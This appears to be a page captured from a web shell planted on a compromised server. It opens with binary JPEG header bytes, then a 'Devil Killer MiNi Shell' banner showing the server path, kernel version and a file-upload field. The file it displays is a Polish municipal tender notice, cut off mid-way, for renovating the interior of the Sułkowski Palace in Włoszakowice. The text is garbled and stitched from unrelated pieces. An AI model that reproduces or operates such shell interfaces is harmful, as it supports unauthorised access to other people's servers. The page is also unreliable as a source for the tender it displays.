JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241007/0053391901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Renowacja z konserwacją wnętrz budynku Pałacu Sułkowskich<br/>we Włoszakowicach. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA WŁOSZAKOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050698</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Karola Kurpińskiego 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włoszakowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-140</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@wloszakowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://platformazakupowa.pl/pn/wloszakowice</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Renowacja z konserwacją wnętrz budynku Pałacu Sułkowskich<br/>we Włoszakowicach. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e29fa6b2-a0a2-4f9d-8e68-cca7cdac4b4b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00533919</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/wloszakowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/wloszakowice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dot. korespondencji elektronicznej Zamawiający określił w Rozdziale VIII SWZ - Informacje o środkach komunikacji elektronicznej, przy użyciu których Zamawiający będzie komunikował się z Wykonawcami oraz informacje dotyczące wymagań technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej i w Rozdziale XI do SWZ - Opis sposobu przygotowania oferty.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuje się że:<br/>1)	Administratorem danych osobowych Wykonawcy jest Wójt Gminy Włoszakowice, <br/>ul. Karola Kurpińskiego 29, 64-140 Włoszakowice;<br/>2)	Kontakt z inspektorem ochrony danych osobowych w Urzędzie Gminy Włoszakowice możliwy jest za pośrednictwem adresu e-mail: iod@lesny.com.pl;<br/>3)	Dane osobowe przetwarzane będą na podstawie przepisów prawa – art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego pn. „Renowacja z konserwacją wnętrz budynku Pałacu Sułkowskich we Włoszakowicach”<br/>4)	Odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp oraz zgodnie z przepisami ustawy z 6 września 2001 roku o dostępie do informacji publicznej;<br/>5)	Dane osobowe Wykonawcy będą przechowywane zgodnie z art. 78 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>w sposób gwarantujący jego nienaruszalność; Jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, Zamawiający przechowuje protokół postępowania wraz z załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia publicznego;<br/>6)	Obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7)	W odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8)	Wykonawca posiada:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Wykonawcy dotyczących,<br/>-	na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych,<br/>-	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>-	prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pan/Pani, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>9)	nie przysługuje Pani/Panu:<br/>-	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>-	prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO,<br/>-	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.12.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest renowacja z konserwacją wnętrz budynku Pałacu Sułkowskich we Włoszakowicach. I etap projektu obejmuje renowację wraz z konserwacją sali reprezentacyjnej tzw. sali trójkątnej Pałacu. <br/>Opis ogólny stanu istniejącego:<br/>1)	pałac został wzniesiony na planie trójkąta równoramiennego o wklęsłych wierzchołkach. Jest wyjątkowy, odwołuje się do nowożytnej, włoskiej architektury rezydencjonalnej. Trójkątny kształt pałacu jest prawdopodobnie analogią kielni - symbolu wolnomularstwa, którego jednym z pierwszych członków w Polsce był ks. A. J. Sułkowski. Symbol trójkąta związany jest z tradycją masońską i interpretuje się go jako triadę siły, piękna i mądrości, a także jako trzy stopnie rozwoju duchowego człowieka - mowa, myśl i działanie. Symbolika masońska mogła wpływać w jakiś sposób na kształt pałacu, ale nie zostało to udowodnione. Przyjęta forma budynku wynikała również z uwarunkowań terenu, kształtu istniejącej (sztucznej) wyspy, przebiegu fosy, kompozycji barokowej całego zamierzenia – wyznaczanie osi widokowych i odpowiednich perspektyw, uwzględnienia układu pomieszczeń i odpowiedniego oświetlenia światłem naturalnym. Bryła budynku jest dwukondygnacyjna (trójkondygnacyjna wg starych opisów). Nad przyziemiem wznosi się wysoka kondygnacja piętra z znacznie cofniętą kondygnacją środkowej sali. Najwyższa kondygnacja nie zawiera pomieszczeń, wzniesiona została by podwoić wysokość wewnętrznej sali i przez górne okna „wpuścić” naturalne światło. Części pałacu nad parterem i nad wysoką salą są przykryte odrębnymi płaskimi dachami. Dach nad środkową salą otoczony jest kutą balustradą z murowanymi słupkami łączącymi przęsła. Na osi elewacji frontowej znajdują się dwubiegowe schody prowadząca do głównego wejścia na parterze oraz drzwi wejściowe przyziemia. <br/> <br/>2)	Zakres remontu sali reprezentacyjnej obejmuje:<br/>a)	sufit - istniejący sufit jest przestrzenny, wykonany z belek drewnianych konstrukcyjnych i wypełnienia z desek, pomalowany/wybarwiony w ciemnym kolorze z widocznym usłojeniem drewna. Sufit należy odświeżyć, odkurzyć, pozbawić zanieczyszczeń, dokładnie zeszlifować/zmatowić wszystkie powierzchnie. Nierówności i ewentualne ubytki uzupełnić, całość pomalować laserunkowo, wszystkie poziomy jednakowo. Do malowania należy zastosować produkty przeznaczone do drewna i do wnętrz, transparentne lakiery lub lakierobejce zachowujące rysunek słojów i bezpieczne dla użytkowników pomieszczenia. Kolor należy wzorować na kolorze istniejącym;<br/>b)	okna – okna usytuowane są wysoko pod drewnianym sufitem wysokiej sali, nad gzymsem z balustradą. Są to okna drewniane, skrzynkowe, dwuskrzydłowe, otwierane na zewnątrz i dostępne z poziomu niższego dachu. Okna doświetlają salę i są zamontowane w węgarkach tworzących wewnątrz iluzję montażu we wnękach. Wymiary okien podano w oparciu o stare dokumentacje i inwentaryzacje. Projektowane okna drewniane zespolone pod względem wymiarów, podziałów, rodzaju i koloru okuć oraz sposobu otwierania należy wzorować według okien istniejących demontowanych, natomiast rodzaj i kształt profili drewnianych klejonych, rodzaj szprosów i ościeżnic wraz z kolorystyką wzorować na oknach nowszych wymienionych wcześniej na poziomie piętra. Przed wykonaniem i montażem nowych okien należy zweryfikować wymiary a rysunek wykonawczy oraz kolor uzgodnić z Wojewódzkim Urzędem Ochrony Zabytków w Poznaniu. Okna należy wyposażyć w zewnętrzne parapety wykonane z blachy tytanowo - cynkowej oraz w listwy nawiewne higrosterowane lub ciśnieniowe wbudowane w profile drewniane lub nakładane i dopasowane kolorystycznie. Okna nie posiadają wewnętrznych parapetów. Nowe okna nie mogą kontrastować z oknami piętra wymienionymi wcześniej.<br/>	Rysunek okien wraz z lokalizacją, wymiarami i proponowaną kolorystyką (RAL9001 l ub 1013) zawarto na zestawieniu – rys. PT 2;<br/>c)	ściany – tynki głównych płaszczyzn sali i detali (gzymsu i balustrady z płycinami) są w dobrym stanie, nie wykazują ubytków ani odspojeń, są trwale połączone z podłożem, mają jedynie ukośne rysy i pęknięcia, najwięcej w ściętych narożnikach trójkątnej sali. Rysy nie wgłębiają się w strukturę ściany, pojawiają się w warstwie tynku i mogą powodować jego miejscowe odpadanie. Małe rysy (do 0,2 mm szerokości i kilku milimetrów grubości) wystarczy pomalować farbą do spękań. Miejsca grubszych rys (2-3 mm) należy wzmocnić materiałem lub taśmą z włókna szklanego po uprzednim przygotowania powierzchni preparatem gruntującym. Pęknięcia należy sprawdzić czy sięgają struktury ścian. Najpierw należy poszerzyć pęknięcie szpachlą, oczyścić z resztek tynku, nałożyć warstwę gruntującą, przykleić taśmę reparacyjną i pokryć zaprawą wpychając ją w głąb pęknięcia, wygładzić, a na koniec pomalować. Jeżeli pęknięcie pojawia się na nowo w naprawionym miejscu należy zastosować „zszycie” ściany za pomocą wklejenia prostopadle do szczelin systemowych stalowych spiralnych prętów średnicy 8 mm, w rozstawie ok. 30 cm i o długości min. 60 cm. Po wykonaniu kolejnej naprawy należy nadal nadzorować budynek pod kątem dalszych zarysować i rozważyć dalsze wzmacnianie, w tym bardziej kosztowne i skomplikowane w wykonawstwie np. podlanie/podbicie fundamentów, zastosowanie wieńców i/lub ściągów stalowych. Prawdopodobne skutki powstawania zarysowań ścian pałacu zostały opisane wyżej. Wszelkie pęknięcia należy zbadać i naprawić dla bezpieczeństwa zdrowia i życia użytkowników budynku. Należy wykonać delikatne oczyszczenie wszystkich płaszczyzn ścian z brudu, kurzu i zanieczyszczeń. Podłoże musi być nośne, suche, wolne od zanieczyszczeń i substancji utrudniających przyczepność. Przy starych tynkach malowanych poprzednio powłokami dyspersyjnymi matowymi należy dobrze oczyścić powierzchnię, przy malowanych farbami klejowymi zmyć ścianę do podłoża. Zastosować specjalistyczne farby lateksowe lub emulsyjne półmatowe przeznaczone do pomieszczeń historycznych zwane odwracalnymi ze względu na możliwość zmycia, o niskiej podatności na zabrudzenia, zakażenie pleśnią i innymi mikroorganizmami. Podłoże oraz warstwy malarskie należy wykonać zgodnie z kartami technicznymi produktów. Przy odnawianiu detali należy zachować rzeźbę i kształt profili. W przypadku instalacji poprowadzonych na zewnątrz należy je położyć w bruzdach i zatynkować. Elementy zbędne, haki, listwy zdemontować.<br/>Ściany pomalować wg kolorystyki zawartej na rys.PAB1/PT1 i opisu PAB;<br/>d)	drzwi drewniane - istniejące drzwi drewniane płycinowe zamontowane zostały w grubych ścianach, posiadają płycinowe obudowy glifów i obustronne rzeźbione wyłogi. Powierzchnie należy oczyścić, pozbawić zanieczyszczeń, dokładnie zmatowić, ewentualne ubytki uzupełnić specjalistyczną szpachlą i pokryć farbą kryjącą półmatową. Wymiary drzwi podano w oparciu o stare dokumentacje i inwentaryzacje. Do malowania należy zastosować produkty przeznaczone do drewna i do wnętrz, bezpieczne dla użytkowników pomieszczenia. Przy odnawianiu drzwi należy zachować rysunek i kształt profili.<br/>Istniejące drzwi pomalować wg kolorystyki (RAL9001 lub 1013) i zestawienia zawartego na rys.PAB1/PT1;<br/>e)	obudowa grzejników – istniejące drewniane obudowy grzejników należy odświeżyć według zasad dla drzwi. Aby poprawić skuteczność ogrzewania zakrytego obudową zaproponowano wymianę środkowej ażurowej części osłony powiększając ilość otworów przez zastąpienie istniejącej kratki drewnianej wykonanej z listew szerokości 2 cm i oczkach 2x2 cm na kratkę z listew szerokości 1 cm i oczkach 2x2 cm.<br/>Istniejącą obudowę pomalować wg kolorystyki (RAL9001 lub 1013) i zestawienia zawartych na rys.PAB1/PT1;<br/>f) parkiet – na podłodze sali i sąsiednich biur położony jest parkiet o klasycznym wzorze „w jodełkę” z pojedynczych klepek w naturalnym kolorze dębu z widocznym rysunkiem słojów. Remont parkietu przewidziano w sali oraz biurach, które stanowią niezbędną rezerwę oryginalnego materiału dla sali. Parkiet jest zniszczony, niektóre klepki są poluzowane a niektóre mają ubytki. Na początek należy sprawdzić spójność klepek z podłożem, klepki uszkodzone przełożyć lub wymienić. Po wyrównaniu powierzchni i ewentualnym przełożeniu lub wymianie uszkodzonych klepek należy wykonać kilkukrotne szlifowanie i cyklinowanie papierami o różnej grubości. Następnie należy wykonać szpachlowanie masami szpachlowymi z dodatkiem drobnych pyłów ze szlifowania. Przed malowaniem wykonać szlif końcowy i ostateczne cyklinowanie. Wykonać nowe listwy przyścienne w poprzednich lokalizacjach. Parkiet wymalować lakierem poliuretanowym zgodnie z karta techniczna produktu zawierającą zalecenia producenta (podkład oraz trzy warstwy malowania).<br/>Parkiet pokazano na rys. PAB 1.<br/>g)	osprzęt elektryczny - istniejący osprzęt sali należy wymienić na nowy jednakowy w kolorze według zaproponowanej kolorystyki (RAL9001 lub 1013) wspólnej również dla okien, drzwi i obudowy grzejników. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45454000-4 - Roboty restrukturyzacyjne</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Najkorzystniejszą ofertą będzie oferta, która przedstawi najkorzystniejszy bilans kryteriów oceny<br/>ofert, odnoszących się do przedmiotu zamówienia. Zamawiający dokona wyboru oferty najkorzystniejszej w oparciu o następujące<br/>kryteria oceny ofert:<br/>Cena oferty brutto [C] – 60 pkt<br/>Okres gwarancji [G] – 40 pkt<br/>1) Cena oferty brutto [C] – waga kryterium to 60 pkt<br/>W przedmiotowym kryterium oceniana będzie cena ofertowa brutto podana przez Wykonawcę w formularzu ofertowym (załącznik nr<br/>1 do SWZ). Maksymalną liczbę punktów w tym kryterium otrzyma oferta z najniższą ceną ofertą (60 pkt). Pozostałe oferty zostaną<br/>ocenione wg następującego wzoru:<br/>C = Cn/Cb x 60 pkt<br/>C – oznacza punkty w kryterium „najniższej ceny ofertowej brutto”,<br/>Cn – oznacza najniższą oferowaną cenę brutto spośród niepodlegających odrzuceniu,<br/>Cb – oznacza cenę brutto badanej oferty.<br/>2) Okres gwarancji [G] – waga kryterium to 40 pkt<br/>Kryterium będzie punktowane przez Zamawiającego w oparciu o wyliczenie arytmetyczne: [okres gwarancji podany w ofercie<br/>badanej: najdłuższy okres gwarancji ze wszystkich ofert niepodlegających odrzuceniu [podany w miesiącach, licząc od daty odbioru<br/>końcowego] x 40 [waga], wg niżej podanego wzoru:<br/>Okres gwarancji w ofercie badanej<br/>G= --------------------------------------------------------------------- x 40 = ilość punktów<br/>Najdłuższy okres gwarancji ze wszystkich ofert niepodlegających odrzuceniu<br/>- oferta o najdłuższym okresie gwarancji otrzyma 40 pkt.<br/>Uwaga!<br/>Okres gwarancji nie może być krótszy niż 36 miesięcy i nie dłuższy niż 60 miesięcy, licząc od daty odbioru końcowego. W<br/>przypadku, gdy Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy licząc od daty podpisania protokołu odbioru,<br/>Zamawiający do obliczenia punktacji w tym kryterium przyjmie okres gwarancji jako 60 miesięcy. W przypadku zaoferowania przez<br/>Wykonawcę krótszego okresu gwarancji niż 36 m-cy, oferta będzie podlegała odrzuceniu na podstawie art. 226 ust. 1 pkt 5 ustawy<br/>Pzp.<br/>2. Zamawiający udzieli zamówienia Wykonawcy, którego oferta uzyska największą ilość punktów [P] obliczonych zgodnie z<br/>powyższymi zasadami wg wzoru:<br/>P = C + G<br/>3. Na podstawie powyższych kryteriów zostanie sporządzone zbiorcze zestawienie oceny ofert. Punkty będą liczone z dokładnością<br/>do dwóch miejsc po przecinku. Najwyższa suma liczby punktów uzyskanych w poszczególnych kryteriach wyznaczy<br/>najkorzystniejszą ofertę.<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną lub<br/>najniższym kosztem. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej, Zamawiający wybiera ofertę z<br/>najniższą ceną lub najniższym kosztem. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa powyżej, Zamawiający<br/>wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych<br/>zawierających nową cenę lub koszt.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w<br/>ustawie oraz w niniejszej SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>6. Do wyboru najkorzystniejszej oferty są dopuszczone wyłącznie oferty uznane za ważne niepodlegające odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - 